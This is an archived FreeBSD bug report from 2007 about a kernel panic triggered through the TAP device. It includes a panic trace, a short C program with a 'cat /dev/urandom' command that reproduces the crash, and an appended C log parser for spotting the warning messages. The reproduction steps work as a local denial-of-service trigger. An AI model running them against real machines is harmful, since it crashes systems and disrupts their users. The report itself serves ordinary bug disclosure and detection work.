Date: Mon, 3 Dec 2007 15:08:13 GMT
From: Gabor Berczi <gabor@berczi.be>
To: freebsd-gnats-submit@FreeBSD.org
Subject: misc/118399: local/remote kernel DoS through TAP device
Message-ID: <200712031508.lB3F8DVQ080758@www.freebsd.org>
Resent-Message-ID: <200712031510.lB3FA4Tg071116@freefall.freebsd.org>
>Number:         118399
>Category:       misc
>Synopsis:       local/remote kernel DoS through TAP device
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 03 15:10:04 UTC 2007
>Closed-Date:
>Last-Modified:
>Originator:     Gabor Berczi
>Release:        6.2-RELEASE
>Organization:
>Environment:
Tested on x86/alpha, SMP/non-SMP.
>Description:
There is a bug somewhere in the FreeBSD kernel that causes lockup if the TAP device receives abnormal data.

..
tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)

fatal kernel trap:

    trap entry     = 0x2 (memory management fault)
    cpuid          = 0
    faulting va    = 0x34
    type           = access violation
    cause          = load instructon
    pc             = 0xfffffc00005dd39c
    ra             = 0xfffffc00005de15c
    sp             = 0xfffffe0007763870
    usp            = 0x11ffd6c0
    curthread      = 0xfffffc0001ef22b0
        pid = 31183, comm = zsh

panic: trap
>How-To-Repeat:
1. Compile this:

#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	if (argc != 2)
		return 1;

	/* Open the tap device named on the command line for writing. */
	int fd = open(argv[1], O_WRONLY);
	if (fd < 0) {
		perror("open");
		return 1;
	}

	/* Copy stdin to the tap device in 2048-byte chunks until EOF or a read error. */
	for (;;) {
		char buf[2048];
		int ret = read(0, buf, sizeof(buf));
		if (ret < 0) {
			perror("read");
			close(fd);
			return 1;
		}
		if (ret == 0)	/* end of input: stop instead of writing empty frames forever */
			break;
		/* Write errors are deliberately ignored so the loop keeps feeding the device. */
		(void)write(fd, buf, ret);
	}
	close(fd);
	return 0;
}

2. Load if_tap, and create tap0 device.
3. cat /dev/urandom|./a.out /dev/tap0

Sooner or later it'll die.
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
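The "discard oversize frame" messages quoted in the report are the only warning the kernel emits before the trap, so a burst of them on a tap interface is worth alerting on. As an added example (not part of the PR or of FreeBSD), here is a small C parser for exactly that message format that counts discards per interface and flags a burst; the message layout comes from the report, while the three-discard threshold and the two extra log lines are assumed/constructed values.

```c
/* Added example: parse tap "discard oversize frame" kernel messages (format as
 * quoted in PR 118399) and count them per interface; threshold is an assumed value. */
#include <stdio.h>
#include <string.h>

struct oversize_evt {              /* one parsed discard message */
    char ifname[16];
    unsigned ethertype, flags, len, max;
};

/* Returns 1 and fills *evt if line is a tap oversize-frame discard, else 0. */
int parse_oversize(const char *line, struct oversize_evt *evt)
{
    int n = sscanf(line, "%15[^:]: discard oversize frame "
                   "(ether type %x flags %x len %u > max %u)",
                   evt->ifname, &evt->ethertype, &evt->flags, &evt->len, &evt->max);
    return n == 5 && evt->len > evt->max;
}

/* Counts discards attributed to ifname across nlines log lines. */
int count_oversize(const char *const *lines, int nlines, const char *ifname)
{
    struct oversize_evt evt;
    int count = 0;
    for (int i = 0; i < nlines; i++)
        if (parse_oversize(lines[i], &evt) && strcmp(evt.ifname, ifname) == 0)
            count++;
    return count;
}

/* Sample dmesg excerpt: first three lines from the report, last two constructed. */
static const char *const sample_log[] = {
    "tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)",
    "tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)",
    "tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514)",
    "tap0: discard oversize frame (ether type 800 flags 3 len 2048 > max 1514)",
    "em0: link state changed to UP",
};
#define SAMPLE_N ((int)(sizeof(sample_log) / sizeof(sample_log[0])))
#define OVERSIZE_ALERT_THRESHOLD 3   /* assumed: alert at 3 or more discards */

/* Returns 1 when ifname reached the alert threshold in the sample excerpt. */
int oversize_alert(const char *ifname)
{
    return count_oversize(sample_log, SAMPLE_N, ifname) >= OVERSIZE_ALERT_THRESHOLD;
}

int main(void)
{
    printf("tap1: %d discards, alert=%d\n",
           count_oversize(sample_log, SAMPLE_N, "tap1"), oversize_alert("tap1"));
    return 0;
}
```

In practice the same parser would be fed from syslog or /var/log/messages rather than the embedded array, and the threshold tuned to how many discards a legitimate tap client ever produces.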
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200712031508.lB3F8DVQ080758>